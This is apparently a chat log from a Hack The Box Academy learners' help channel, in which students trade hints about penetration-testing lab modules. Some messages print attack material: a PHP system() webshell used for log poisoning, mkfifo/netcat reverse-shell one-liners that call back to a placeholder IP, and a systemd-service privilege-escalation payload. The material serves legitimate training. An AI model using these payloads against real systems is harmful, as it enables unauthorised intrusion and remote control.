#modules

1 messages Β· Page 15 of 1

tiny ledge
#

Was there something done to the VM's? Every time I try to alter the URL or do any action apart from opening the normal page I just get errors nowadays:

#

I have to reset the target URL if I do anything:

#

And the timer goes down from 90 minutes to 3 minutes in 30 seconds, is this normal ?

#

resetting, and the time left is 79 minutes down from 90 minutes in 1 second:

lament tartan
late sail
#

Hello, everyone! I'm new. I can't wait to get home to check HTB out 😁

placid quest
#

@late sail have fun πŸ‘

late sail
#

Thx ☺️

solar zodiac
#

Hi everyone πŸ™‚

#

was wondering if there was anyone I can msg about the last part of common applications - skills assessment 1

hazy grotto
#

Did you find a solution to this? i'm having the same issue.

swift fractal
#

Hi Everyone! I am new to this. Please share some wisdom with me! 😁

blissful verge
solar granite
#

Hi guys, I'm stuck at the File Inclusions Skills Assessment. I have found ||the admin panel||, and I'm trying to ||poison the logs|| with ||a Host header <?php system($_GET['cmd']); ?>, then trying to run commands like ?log=system.log&cmd=id. I also tried the other logs, http.log and chat.log||, but nothing works. Am I on the right track with this?

timid pollen
#

you can find the result of ls / in the nginx log

#

also have you been able to find the lfi? @solar granite

solar granite
timid pollen
#

also the command you are trying to run "?log=system.log&cmd=id" is wrong

solar granite
timid pollen
silver zenith
#

/var/log/nging/access.log

#

Thats what u pooling for

#

Looking

solar granite
#

Thank guys, I'll check it out again later

buoyant drum
#

Hi, Can any help me. I'm lost( Footprinting Lab - Medium) in the database(SQL Server Management Studio) don't know how to find the password.

queen gazelle
#

Hi friends --
I am working through the "Active Directory Enumeration & Attacks" course on Academy. I am stuck at this question:

"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"

The powershell command seems to time out. As a result, I am using Bloodhound but the two permissions I see are invalid answers. I understand the "ObjectAceType" is different than the "ActiveDirectoryRights" but cannot seem to get the correct answer. I am guessing I am missing something small.

Here's the URL for reference: https://academy.hackthebox.com/module/143/section/1485

placid quest
#

@buoyant drum what is the problem

buoyant drum
#

I have loged into SQL Server Management Studio but I can't find the password for the user "HTB".

#

I'm kinda lost. Need some hints about database name or path to the password.

lethal atlas
buoyant drum
oblique sluice
#

i need to get from a file the pattern i specify and after that until the last / of the line, so basically from a point to another point of a file. How to?

sturdy igloo
#

yay... finally done with Linux Privilege Escalation πŸ™‚

silver zenith
#

I suck at privesc

west canopy
#

@queen gazelle DM me πŸ˜‰

frigid monolith
#

Having some trouble figuring out "Using Web Proxies - Encoding/Decoding"

#

Could anyone give me a little nudge?

west canopy
frigid monolith
#

yeah you do that and you start getting something that doesn't look like b64 anymore

safe token
#

guys. where are the instruction for the windows fundamentals skill assessment? like where do i create the new user for thats needed? wherre do i add them to group?

#

i don't remember them being the "lectures'

west canopy
safe token
#

yes i can do that but the skill assessment says i need to set up a few things and i don't know where

west canopy
#

yes that's the challenge πŸ˜‰

safe token
#

then google gonna be my friend again lol

frigid monolith
#

Google's everyone's friend!

#

Invaluable hacker tool!

west canopy
# safe token then google gonna be my friend again lol

always be ready to use outside resources... many of our modules are "mostly guided" but there are absolutely times where we will make you do research on your own. Not sure if that's the case for Windows Fundamentals as I did that module like 11 months ago and can't remember lol

safe token
#

well i just went through the module and haven't find the info for where to create the user so im just gonna go with google noww and see what happenes

lethal atlas
#

what up @west canopy !! How have you been bro?

west canopy
#

living the dream dawg πŸ™‚

lethal atlas
#

lol i feel ya

stuck hull
#

Hello all,

I'm new to this and working my way through the beginning modules.

In the Web Enumeration module it says to add a DNS Server such as 1.1.1.1 to the etc/resolv.conf file. What is the purpose of this?

Thank you

silver zenith
#

Thats cloudfares right?

#

For example 8.8.8.8 is foogle dns

west canopy
#

that would only be necessary if you're having some sort of DNS issue

#

no need to edit anything on PwnBox

silver zenith
#

Isnt also contributing to anonimity?

onyx rapids
#

Broken Auth - Brute forcing Cookies -> "Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user."

What the heck is the username? Seriously, I've tried every admin name I can think of and none work. I even tried "Super User" and it says, "Unfortunately, as Super User you dont have any flag." This is the permission you told me to use!!!!

lethal atlas
rustic sage
#

^ can someone dm me I still haven't found it.

stuck hull
#

Thanks @silver zenith & @west canopy.

cosmic dock
#

These modules and the vagueness/inaccuracies of the hints or what they're looking for, is getting extremely tiresome.

safe token
#

hey. im doin the bash scripting module. could someone whos knows it PM me?

#

the question is
Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer.
and i got a number but it is not accepted as the correct answer

tame fox
#

Have you considered that indexes start at 0 and not 1 ?

safe token
#

well the counter start from 1 not 0

#

but i'll check

tame fox
#

No worries ^^

#

Let us know how it goes for you

safe token
#

yup you were right

#

should have thought about that

tame fox
#

Well done !

cosmic dock
#

Where is the password for the MSSQLSVC user found - Attacking Common Services - Attacking SQL DB's

#

I'm tired of going in circles

solar zodiac
solar granite
onyx rapids
safe token
#

guys. how do i check if a string contains another string in bash?

#

should i just go through the string char by char and check it? or is there an easier way?

lethal atlas
#

Comparison operators?

tiny ledge
#

Can someone help me with 'FILE INCLUSION' Second assignment: Basic Bypasses | Everything I try, seems to give me 'Illegal Path Specified!'

safe token
lethal atlas
#

I do, dm me and we can see what you have so far and what you need

west canopy
opal vapor
#

Has anyone experience with the STACK-BASED BUFFER OVERFLOWS ON LINUX X86 module? I stuck by the TAKE CONTROL OF EIP part. I dont know at wich point I need to take the EBP. Does anyone know?

tiny ledge
iron basin
#

Can anyone provide some guidance on the File Transfers, Window File Transfer methods first question?

iron basin
# lethal atlas use wget

Little embarrassed as this shouldn't be stumping me but I use that. Shouldn't the command be ||wget http://(IP)/flag.txt?||

lethal atlas
#

exactly

iron basin
# lethal atlas exactly

Weird, I did that command earlier and didn't work, must've been something on my end. Thank you.

wind gust
#

can someone help me with command injection skill assesment. I get bad request

woeful oxide
#

Hey guys, stuck at intro to network analysis - tcpdump fundamentals

#

question 1 & qs 4

raven cairn
#

Could I have some help on the footprinting Snmp section?

#

Find it a bit confusing

#

I would say Cpts goes over much more information than OSCP. I haven't done OSCP but looking at the syllabuses of both it looks like HTB goes much much deeper. CPTS can be a good way to prepare, but you might also need to do the buffer overflow modules and the corporate osint module.

vital adder
# woeful oxide question 1 & qs 4

so i can't find my note on this module but for question 1 check the first line of the images and for question 4 hint you will need ||2|| tag and you have to include sudo tcpdump in the answer

iron basin
vital adder
#

sure

queen gazelle
#

Hey @tranquil zodiac! You are correct -- I am sitting for the OSCP on December 8th. To be honest, I am really dissappointed with Offensive Security as an organization. I paid $1,500 for 90 days of access to the PEN-200 course and their labs. The course itself is just a large, outdated .pdf which does a terrible job at teaching the concepts. The labs are shared between ALL students so you don't even get dedicated VMs even though I am paying $500/month. Their new "flag submission" process is just a sub-par version of TryHackMe or HackTheBox.

I am still planning on passing the OSCP due to the name recognition but I sincerely hope orgs such as HTB, THM, and TCM Security begin taking over. Offsec has turned into a greedy organization with bad infrastructure and terrible support

raven cairn
queen gazelle
#

HTB Academy has been excellent. I am working through the AD Enumeration & Attacks course. It's really really good. This is what I was expecting from PEN-200. I cannot say with certainty if it will prepare me for the OSCP simply because I have not taken it yet... But I CAN say it will do a better job than the $1,500 bloated PDF that Offsec gives you.

raven cairn
#

I like hackthebox because the price is very reasonable

#

especially if you are a university student

#

amazing bang for buck

iron basin
#

Lel, I am stuck on how to properly upload a zip file to my target machine on the File Transfer Windows section. Any help? I tried using wget post method however the file is empty on the target machine.

iron basin
raven cairn
#

Same haha

#

I really hope hackthebox academy adds some more certs, and fixes some of the modules/sections. Because if that happens it will be by far the best place to learn hacking.

iron basin
#

Currently working towards the new Penetration tester specialist cert

queen gazelle
#

Yeah, academy is solid. I honestly cannot describe how terrible the Offensive Security teaching and infrastructure is compared to HackTheBox. It's night and day. As a student, you get access to a forum that's full of weird riddles because you're not allowed to give any type of spoiler. The organization's motto is "Try Harder" because they suck at actually teaching concepts so they push the blame onto the students. I'm really hoping I pass the OSCP so I can make a video on my YouTube page explaining all of this without looking like a sore loser πŸ˜„

raven cairn
#

I'm so glad I am doing academy instead of OSCP

queen gazelle
odd kayak
#

Hey guys how to join in HTB CTFs

#

😐😐I am unable to join

west canopy
unique valve
west canopy
#

yooo what's up @unique valve

pastel ginkgo
#

Could someone help me out, I'm on the Shells & payloads 2nd host || I found the exploit it wants you to upload on to the server but when I add it to the metasploit folder I can't find it to start the exploit||

unique valve
unique valve
pastel ginkgo
#

How do I do that?

prisma knoll
#

Hey all, is there any modules focusing on jwt attacks? I'm working on some challenges related to jwt attacks, and don't find much on HTB acad sadly. Already tried a lot of stuff (none alg, alg confusion, playing with self-signing JWS, JKU, lfi/sqli with KID etc...) but can't manage to solve this chall, so if you have any ressources or knowledge to share i'd like to take it πŸ˜„

west canopy
pastel ginkgo
#

nvm I figured it out πŸ€¦β€β™‚οΈ

unique valve
prisma knoll
iron basin
pastel ginkgo
iron basin
#

I found the exploit it wanted however when I loaded it into metasploit, fill out the options, and run it I receive an error.

west canopy
iron basin
timber hatch
limber ledge
#

has anyone completed the attacking enterprise networks module? struggling with it

west canopy
#

where are you struggling my dear?

limber ledge
#

not sure how to do this "Perform a banner grab of the services listening on the target host and find a non-standard service banner.Β "

#

i tried a command line including dimtry -pb but had no luck

west canopy
#

i think I was able to get it with nmap -A

#

which section and question #?

#

first section first question?

raven cairn
#

I was doing the Box "Secret" and had no idea wtf a JWT was

west canopy
#

not even BSing you lol

limber ledge
limber ledge
valid lynx
#

Anyone new that what's to learn with me?

pastel ginkgo
#

Could someone lend me a hand on box 2 of Shells & payloads? || i'm trying to run the metasploit and i've set the vhost to 172.16.1.12:80 but I still can't get it to execute||

vital adder
#

try setting it to the ||subdomain "blog.inlanefreight.local"||

pastel ginkgo
vital adder
# west canopy

oh btw i also need help with that section but on question 3, i have no idea what subdomain that question want

west canopy
#

sec I will DM

vital adder
#

sure thanks

warm turret
#

hello folks, 2 more and i finish my BBH path. Server Side Attacks done and easier than i tought https://academy.hackthebox.com/achievement/433014/145

west canopy
#

fantastic!!!

warm turret
#

Thanks a lot again @vital adder ans @lethal atlas for help me with the Broken Authentication where i lost so much time stuck

wanton dirge
#

is kali linux free ?

balmy radish
#

Yes

vital adder
#

no the license is 69 USD

balmy radish
#

He is kidding about that

thorn urchin
#

its 1 bitcoin

timber hatch
#

hello everbody
when i upload: <?php system($_GET['cmd']);?> for a reverse shell, and after do cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc MYIP PORT >/tmp/f (in burp with url encoding)

shouldn't I be able to gain a reverse shell with netcat?

vital adder
#

if after you upload that and you can run command and also the target machine have netcat installed then yes i think you should be able to get a rev shell

timber hatch
pastel ginkgo
#

How can I pass a base 64 string to windows then have it output it as a bat?

silent mulch
#

folks, Once I sign up on the HTB Academy with my student account, is there a limit till when the student account will remain active or will it remain active till the time that particular E-Mail is functioning?

safe token
#

i think the only time its gonna be deactivated is when you email account is deleted or if you don't pay for a few months.

#

could someone help me with the bash scripting module. im kinda stuck at the flow control - loops part.i don't know much about bash

rustic sage
#

Can I speak to someone about getting stucked in Footprinting module?

vital adder
rustic sage
vital adder
#

sure

covert vault
#

Does anybody else have issues with getting disconnected from the connection pack constantly when working with modules?

silver zenith
#

Dont know

#

I do eveytong on pwnbox

#

Omg

#

Fqdn

#

Must give some respect to htb staff. Im really enjoying this platform. Academy is freaking awesome

#

Even with easy modules i knew pretty good i am still learning new things

thorn urchin
#

same, its a joy

silver zenith
#

Ot is kindoff inspiring

west canopy
late sail
#

yo guys, I have a question... I'm about to have my first contact with HTB and I don't know what to pick between TCP or UDP at the ovpn... wouldn't it be a no brainer to pick TCP?

limber ledge
#

anyone do this part in attacking enterprise networks "Perform a DNS Zone Transfer against the target and find a flag. Submit the flag value as your answer (flag format: HTB{ })." .. im trying to use dig (my target IP) -t ns

vital adder
#

you are basically using dig to find the ns record not a zone transfer

limber ledge
#

what would be a better command? still using dig?

vital adder
#

a better command would be the zone transfer command

#

you can use google or the example command for that

limber ledge
#

yeah google told me to use that command i first tried

vital adder
#

oh yea you can use the ns subdomain for the zone transfer or you can just use the target ip both work fine for me

limber ledge
#

HTB{qraardra}

#

the qr ra rd ra is the only flag i can find

vital adder
#

hint try the give example dig command

limber ledge
#

thank you!

west canopy
# limber ledge thank you!

Attacking Enterprise Networks is the capstone module of the Pentester path. Have you done any of the other modules?

pastel ginkgo
#

So I just finished the Shells & Payloads Module and for host 3 || I was able to successfully complete it with the intended Metasploit module but I'm curious about going about another way. || || I was able to get a webshell on it but it only got me to have www user access, how would you go from there and escalate yourself to full privileges? I was thinking I could use mscvenom to make a package then push it on to the host via my webshell then use the reverse shell for a more stronger attack interface. || I'm just curious if anyone else had a more unique solution

covert vault
#

Struggling to pull a file from an RDP session within one of the modules, could anybody possibly assist?

wind egret
#

Got a question about the public exploits bit for the getting started module. I have the target IP, I'm pretty sure I know what I need to be searching for for searchsploit, but there's so many options and after that, no idea how I'm supposed to find the right one for metasploit considering there's multiple options for that too

wind egret
#

or maybe the answer lies with the error I get when running nmap that says that 1 service unrecognized despite returning data

thorn urchin
#

sometimes ya just pick one to investigate and go for it. But ideally youre gunna wanna try specific version numbers if you can

wind egret
#

I might be missing something because doing a search with the specific version number brings up one result, but I'm unsure where to go from there

thorn urchin
#

read about the result

wind egret
#

I don't see how to take the info I get with searchsploit and apply it to metasploit, if that makes sense. I've googled the service plus version to see about exploits and I've found some but I don't understand how to apply that to metasploit to advance with the problem. In the example for the module, they just googled and got the name of an exploit to search. That isn't the case here

thorn urchin
#

have you tried the msfconsole search functions to find the module listed by your searchsploit result?

#

presuming your result was a .rb metasploit module

wind egret
#

the result was not a .rb, but a .txt. Do I need to be keeping an eye out for a .rb result with searchsploit?

thorn urchin
#

if you want to use metasploit yeah. But if you got a .txt you should read it, not all exploits need to be used with metasploit

#

it could be something simple that can be done by hand

#

but that module probably does want you to use metasploit for this first one. So dont be afraid to search for other service versions you find to see if something easier reveals itself

wind egret
#

I'm wondering if that unrecognized service has anything to do with the answer because it feels like I'm running in circles, unless there's a sudden spike in the learning curve all of a sudden. All previous questions have been solved with a few minutes of rereading the content on the page, at most

deft bison
#

I'm having the issue with trying to change the passwd for the admin acct, were you able to figure out?

sturdy igloo
acoustic owl
old mesa
#

hi

wind egret
#

alright so, just to confirm I'm not on some wild goose chase and I'm actually on the right track, nmap shows two ports open and one service unrecognized despite returning data. One of them is the domain service, while the other is http with Apache httpd 2.4.41 ((Ubuntu)). It's the latter I want to search for exploits, ye?

thorn urchin
#

Dont remember off the top of my head. Its worth checking out the web server there though, it definitely could be running a web app that could be the target you need to exploit.

#

I remember a couple of the pages in that module requiring that

wind egret
#

and how would I go about doing so?

thorn urchin
#

Open a browser

#

and use your eyeballs to see whats there

wind egret
#

alright figured lol. I just want to make sure I'm not missing anything

thorn urchin
#

You won't know without checking

#

enumeration is like 80% of hacking

wheat garden
#

any one on now that's done password attacks module - hard assessment give me a tip or hint? Haven't made any progress yet into this assesment. Used hydra on some services and it was giving false positives and right now brute forcing smb with crackmap.

thorn urchin
wheat garden
thorn urchin
#

Then youre on the right path

#

but I dont think you need rockyou

wheat garden
wheat garden
wind egret
#

I feel dumb, I can't get gobuster to run. Keep's timing out and I'm certain it's because I dont have the url scheme correct. The frustrating part is I got it working earlier lol

wind egret
#

Like I said, I'm certain it's something simple I'm just missing. I'm long due for a break, but I'm so close to cracking this module problem

acoustic owl
#

do you get an error message? The command seems to look good to me at first glance.

wind egret
#

Error: error on running gobuster: unable to connect to http://46.101.17.112:32316/: Get "http://46.101.17.112:32316/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

#

url is fine because it brings up the webpage in a browser

#

gonna try restarting the VM and seeing if that helps

thorn urchin
#

sanity check 1. sure its http and not https

wind egret
#

webpage has the lock crossed out, which indicates http, no?

thorn urchin
#

idk I never pay attention to the lock I just look at the url and see if http proto is being used or https proto

wind egret
#

it's http. Technically just shows the IP because target, but copy paste has http

thorn urchin
#

mmkay then yeah your command looks sane so idk

wind egret
#

same error. hmmmm

#

wait, hang on, might just be dumb. Was the wrong IP

thorn urchin
#

well thatd do it

wind egret
#

the trappings of using up arrow to retry code

#

annd correct ip, same error

thorn urchin
#

is the correct ip http or https πŸ˜‚

wind egret
#

gobuster dir -u http://46.101.17.112:32316/ -w /usr/share/dirb/wordlists/common.txt

#

might be time to look into how to use ffuf

thorn urchin
#

are you able to curl the page

wind egret
#

....huh, curling brings me to to the default welcome page used to test the correct operation of the apache2 server

thorn urchin
#

well its something

wind egret
#

okay there we go. I just entered something wrong. Copying and pasting the url from the browser for curl does indeed bring me to the wordpress page

thorn urchin
#

maybe just latency screwing you some then for gobuster

wind egret
#

could be. So a "try again later" deal?

thorn urchin
#

use the --timeout flag to give it some extra time

wind egret
#

that worked

thorn urchin
#

latency it is then

wind egret
#

Might be time to restart the router lol

thorn urchin
#

Ive noticed that golangs default socket timeouts tend to be pretty punishing

#

im 80% sure its why amass doesnt work with tor and it baffles me they dont have a timeout flag

wind egret
#

welp solved the problem. I was overthinking things WAY too much, but it lead to some trobleshooting and research practice, which I feel I'm gonna need in the future. So can't complain too much

#

this has also made me realize I can't wait for cyber monday to nab a pair of monitors. One screen, even if it's a tv, isn't enough lol

covert vault
#

In password hacking hard lab - are we supposed to ||mount the bitlocker vhd file using guest mount and then pass in the passphrase to unlock it? I cracked the password to it but cannot get it to mount for the life of me||?

thorn urchin
#

Yes

#

you can also try mounting it in a windows install too

#

except I dont think guestmount worked for me, pretty sure I used something else, idr

covert vault
#

Yeah I was having zero luck with it

thorn urchin
#

I remember spending like a solid half hour googling things to get it to mount

#

oh just remember what I used

#

ntfs-3g

#

google that and some relevant additions and youll find what you need

covert vault
#

Appreciate it, I'll give it a chance

graceful mortar
#

hi someone help me with Linux Local Privilege Escalation

hazy grotto
vital seal
#

Need help πŸ™‚

**Path **: Penetration Tester
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section:Password Spraying - Making a Target User List
Question: Enumerate valid usernames using Kerbrute and the wordlist located at /opt/jsmitht.txt on the ATTACK01 host. How many valid usernames can we enumerate with just this wordlist from an unauthenticated standpoint?
https://academy.hackthebox.com/module/143/section/1455

Command executed:|| kerbrute userenum -d inlanefreight.local --dc 10.129.22.219:3389 jsmith.txt||
This IP|| 10.129.22.219|| was generated by htb and logged in as ssh

Idk what I'm missing? getting error with this command

covert vault
thorn urchin
#

you try em!

opal storm
#

Is anyone available to help on the Nibbles module ?

#

I cant upload the image.php file through the image uploader on the blog by using msfconsole and using the exploit. Ive researched the problem I am having and it seems common. I just havent had a solution that works for me.

#

here is the error im getting

#

[!] This exploit may require manual cleanup of 'image.php' on the target

opal storm
#

Lol I figured it out. Man its always so simple. Just had to fill out all the fields.....duh

mighty ice
#

Hey all, having some issues with the Linux Fundamentals module

Currently i'm VPNed into the Academy through the .ovpn file provided when you click Get VPN Key

It's asking me to ssh into a machine with the given credentials, however when i run ssh htb-student@<machine address> i get a Connection Timeout in return

rustic sage
mighty ice
rustic sage
#

okay thats weird πŸ˜…

#

try regenerating the vpn

mighty ice
#

Gave that a try, no dice

cedar ivy
#

you are working on windows or system based on linux

mighty ice
#

System based on Linux

#

My whole system setup is a bit of a cluster<bad word> though

cedar ivy
#

I see, actually i did that module yesterday and i didnt have any problems, let me check again if there something that you are missing

mighty ice
#

If it's relevant, this is what i'm seeing

cedar ivy
#

Working for me, the only thing that I think is happen is that your target (time left) is over so you need to reset target.

mighty ice
#

Just regenned the target and still nothing

#
ping 10.129.102.63
PING 10.129.102.63 (10.129.102.63) 56(84) bytes of data.
^C
--- 10.129.102.63 ping statistics ---
8 packets transmitted, 0 received, 100% packet loss, time 7012ms

Well that'd explain a lot

cedar ivy
#

yep, that explain all xd

mighty ice
#

The machine has to be online otherwise i'd get a Destination Host Unreachable right?

cedar ivy
#

Yes

mighty ice
#

So the machine's online just not responding to anything

cedar ivy
#

ip addr, ensure you ahve the connection to the vpn working

mighty ice
#
15: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
    link/none 
    inet 10.10.14.151/23 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 dead:beef:2::1095/64 scope global 
       valid_lft forever preferred_lft forever
cedar ivy
#

So weird

mighty ice
#

Perhaps its my system itself

#

It's Android 10 with LineageOS 17.1 running a Kali NetHunter chroot so maybe the host OS doesn't like routing traffic through the tunnel

cedar ivy
#

could be, I running a vm on windows, that vm is a kali linux and I dont have any problem :/

mighty ice
#

Actually no that cant be the issue

#

Android itself recognizes tun0

mild sand
#

thanks for the tip. I just solved it. One question btw, typically we use common.txt or small-2.3-txt to search for hidden files. but here its in some number.html file, in the real world are we expecting this ? Im new to cybersec sorry for the silly question.

feral gyro
heady steeple
#

how to learn everything from scratch ?

latent sage
#

hello evryone please can someone help with the file inclusion module final assessment ??

arctic acorn
#

Is anyone else having issues with the Active Directory enumeration and attacks lab? Since yesterday I keep on getting a 'system error 110: Connection timed' out on both VM and Pwnbox when RDPing in to the attack machine.

solar granite
#

Hi guys, need some help with File Inclusion skills assessment. I got the ||admin portal||, found the lfi there, and I can access files on the system. I'm now trying to ||poison the logs with curl -s "http://IP/ilf_admin/index.php" -A '<?php system($_GET["cmd"]); ?>'||, but it doesn't show up in the logs. I then try to execute commands with ||http://SNIP/access.log&cmd=id||, but I don't get the output of my command anywhere

Edit: I also tried executing commands like ||curl -s "http://IP/ilf_admin/index.php" -A '<?php system("id"); ?>'|| but it doesn't work either

Edit2: be mindful of quotes usage. It works with ', but not with " in the payload. Also make sure your payload is ||just a command you want executed, not the $_GET... thing, as it never worked for me||

warm turret
#

I'm not sure about this excercise but you should put an ? After your .log instead of &

hollow hinge
#

And see results on log files

solar granite
# hollow hinge poison `/proc/self/environ`

Can I break the webapp by doing it wrong? After a few unsuccessful payloads it seems to not log anything anymore
I'm trying it like curl -s "http://IP/ilf_admin/index.php?log=../../../../../proc/self/environ" -A '<?php system("id"); ?>', and /proc/self/environ gets www written inside, then it stops logging requests

solar granite
warm turret
#

@solar granite i had this issue, after some time/logs it stopped from loggin

#

What if you just send your payload as a parameter in your url

solar granite
# warm turret What if you just send your payload as a parameter in your url

Still doesn't work, I try /index.php?log=%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%24%5f%47%45%54%5b%22%63%6d%64%22%5d%29%3b%20%3f%3e (which is <?php system($_GET["cmd"]); ?> url-encoded). Then I try to access it like index.php?log=../../../../../var/log/nginx/access.log&cmd=id, but I don't get code execution

#

It does get logged tho, the requests appear in access.log

solar granite
#

Solved

rustic sage
#

hello hello hello

raven saddle
#

Anyone in the academy on module 18, the Linux fundamentals?

opal vapor
#

I am trying to exploit a Stack-based buffer overflow the shellcode is in the pics. But if I try to run the command in gdb and setting up the netcat listening on the same port I dont get any response in the netcat log. is the shellcode right? Or is something else the problem?

crisp remnant
#

Anyone for the last section on attacking common applications ?

vital seal
vital adder
vital adder
sturdy igloo
#

long time no see @vital adder

hexed bison
#

Hi, I need help on Password Attacks/Password Mutations. I've tried many things to reduce the list but without success

vital adder
#

if it's taking too long cut the first ||17000|| password

hexed bison
#

Thanks. it works. I thought the solution was a clever way to reduce the list, not a random magic number.

lethal atlas
warm turret
#

@hexed bison try using the sed commands on the examples to let only the passwords that are policy compliant. Try my script that i shared here in the channel to achieve the same results. Around 14k passwords to test

#

And do not try the mangling option. You'll not need it πŸ˜‰

hexed bison
warm turret
#

@hexed bison the same as in the examples. Otherwise, try to create a new account and check the requirements

#

Besides when you find out the first web creds, they suggest you to change your password and they set you the policy

hexed bison
warm turret
#

I speak of skill assesement on the module

#

The sections will be solved just repeating the steps of the section

simple dragon
#

Anyone able to help with SQLMap Essentials: 'Running SQL Map on an HTTP Request' question 2? The hint says "Try to see where the 'id=1' is sent, and specify this location as the injection mark." I have no idea where to even start. Maybe it's just a Friday thing, but I'm throwing commands at the wall.

hexed bison
#

but Thank you, I'll use it later

warm turret
#

@simple dragon inspect the request and add an * next to the id=1

simple dragon
#

got it. thanks!

thorny glade
#

Hello, Is there any free learning path blog for HTB the one similar to THM?

So far no luck thanks!

vital adder
#

nope for htb academy the only free module is the tier 0 module

hardy anchor
#

Hey all! I'm having problems with password attack lab - hard. I was able to find ||Johanna|| creds, download ||keepas|| file, crack ||keepas|| file, get ||David|| creds, log into ||smb|| and get .||vhd||, crack .||vhd|| and obtain the cred (warning hudge spoiler -->) ||123456789!||. I upload to ||Johanna|| windows session the .||vhd|| file to open with the cred I found but doesn't work. Any hint please?

vital adder
#

oh you don't have permissions do mount stuff in the target machine

#

mount the ||.vhd|| file on your machine (guestmount don't work)

hardy anchor
vital adder
#

oh no this isn't a virtual machine drive this is just a ||bitlocker encrypted partition||

#

you can just mount this on your windows

hardy anchor
#

Rigth. I'm stupid jajaja

#

Thanks bro

thorny glade
onyx rapids
#

question about the Bug Bounty Hunter certification exam. Was the exam content outsourced, or was it done in house?

warm turret
#

@thorny glade i've tried both and i prefer HTB by far, in THM the content is too spilled. It os hard to follow a thread of knowledge. Not like HTB. You can look on Portswigger also

summer lava
#
find / -user root -perm -4000 -exec ls -ldb {} \;
``` I used this to find files that belongs to root and i have access too.. that are executable

priv=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip] [port] >/tmp/f"
[Install]
WantedBy=multi-user.target' >$priv
/bin/systemctl link $priv
/bin/systemctl enable --now $priv

hollow hinge
hollow hinge
solar granite
solar granite
hexed bison
indigo peak
#

is there anyone else that has issues with the Help message box??

junior shell
#

I am in the Linux Privilege Escalation Module on the Special Permissions section. I am trying to answer the question asking for the file where setuid bit is set. I am trying to submit a file name, path, and everything but I can't seem to get it right. Can somebody point me in the right direction of what I am supposed to be submitting?

craggy kernel
#

Does HTB start assuming no knowledge, or do I need to know any languages before I start?

west canopy
craggy kernel
#

Yea

west canopy
#

nope no programming knowledge is needed

#

you'll be using bash and python scripts, some modules absolutely require SCRIPTING knowledge

craggy kernel
#

Cool, I have another question, does the skills on the course apply to malicious hacking, like the stuff that most people would think of if you said hacking? Or is that done differently to this?

west canopy
#

Academy at the moment is mostly focused on pentesting web and infrastructure.

#

we certainly hope you choose to be ethical πŸ˜‰

junior shell
#

I sent you a DM Jared

west canopy
#

the training we offer is agnostic, how you choose to use it is up to you. But yes you will absolutely learn what real threat actors are doing

timid pollen
#

hi guys i am doing AD module and i am stuck on this Find the name of an account with a ServicePrincipalName set that is also a member of the Protected Users group

when i do the below command i get only 2 users: kerberos and sqlqa

Get-ADUser -Filter "adminCount -eq '1'" -Properties * | where servicePrincipalName -ne $null | select SamAccountName,MemberOf,ServicePrincipalName | fl

any advise?

craggy kernel
#

Oh I did not realise, so hacking training is available freely, you just trust everyone

raven cairn
jovial solstice
#

I'm doing cracking the box, knowledge check. I finally got root access using php to exec('/bin/bash'), but the terminal shows no output for anything I do.

thorn urchin
#

There are some differences between whats taught in academy and say malicious hacking though. But that mostly boils down to the fact that good guys dont need to worry about attribution or opsec as much(in the sense that the main opsec considerations for good guys are preserving client data and secrets during an engagement).

Bad actors also often have more time to play with, which means they can opt for slower, stealthier, more methodical approaches(which can be a requirement for avoiding said attribution and getting caught.)

raven cairn
#

pentesting and irl hacking a little different but similar

thorn urchin
#

like a good guy doing a bug bounty program can just fire up their browser and burp and just go for it. A bad guy is going to have to chain stuff through tor and proxies, go slower due to increased latency, and also must be able to leverage findings deeper. All of which is going to affect their tactics techniques and procedures

raven cairn
#

Could I have help with footprinting lab - hard

#

Don't know what exactly is the community SNMP string

thorn urchin
#

community default is public, otherwise brute it

raven cairn
#

I bruted it with onesixtyone

thorn urchin
#

then use it with some of the recommended tools for enumerating snmp from the module on it

#

fair warning its a ton of text and is basically like looking for a needle in a haystack but youll know what youre looking for when you see it

raven cairn
#

Im using snmpwalk but don't know if I should use the full string

#

For example should the community string look like ""Linux htb 5.11.0-34-generic #36~20.04.1-Ubuntu SMP Fri Aug 27 08:06:32 UTC 2021 x86_64"?

thorn urchin
#

?

#

thats not something you need to input at all, so not sure what youre asking

rustic sage
#

do you know what is the basis for the recommendation of boxes when you finish a module? I can't find the relationship between the Network enumeration with nmap module and the suggested boxes.

thorn urchin
#

id recommend rereading the snmp page. The actions you need to preform are nearly copy paste right from the examples

raven cairn
#

snmpwalk -v2c -c <??????> <fqdn/ip>

#

if that makes sense

vital adder
#

oh i wasn't able to get snmpwalk to work for me in this part but you can hint you can use a different tool show in the snmp section

#

also snmpwalk -v2 is for version 2

raven cairn
#

Ok that makes much more sense

thorn urchin
#

Deleted in case someone else searches this topic

#

I dont mind dropping an answer when its literally right in front of you but just dont know what part of the output is relevant lol

#

would recommend deleting your image as well to avoid spoiling someone else either

thorn urchin
# timid pollen any advise on this?

Not helpful but to not leave ya hanging, havnt done that module yet so not much advice I can give, other then you can use another command to list users in the protected users group and then just cross-reference them.

https://everythingsysadmin.wordpress.com/2013/07/16/detecting-members-of-protected-groups-within-ad/

timid pollen
thorn urchin
#

then sounds like youve got two users that are valid

timid pollen
#

yeah i have tried both of them but i get wrong answer

timid pollen
thorn urchin
#

try without the where servicePrincpalName and just see what users you have that fall under the protected on in the first place

timid pollen
#

PS C:\Users\htb-student> Get-ADUser -LDAPFilter "(admincount=1)" | select SamAccountName

SamAccountName

Administrator
krbtgt
daniel.carter
sqlqa
svc-backup
svc-secops
cliff.moore
svc-ata
svc-sccm
mrb3n
sarah.lafferty
jenna.smith
harry.jones
trisha.duran
pixis
Cry0l1t3
knightmare

#

got this and i have tried all of them

#

but no lock

#

luck

thorn urchin
#

Β―_(ツ)_/Β―

#

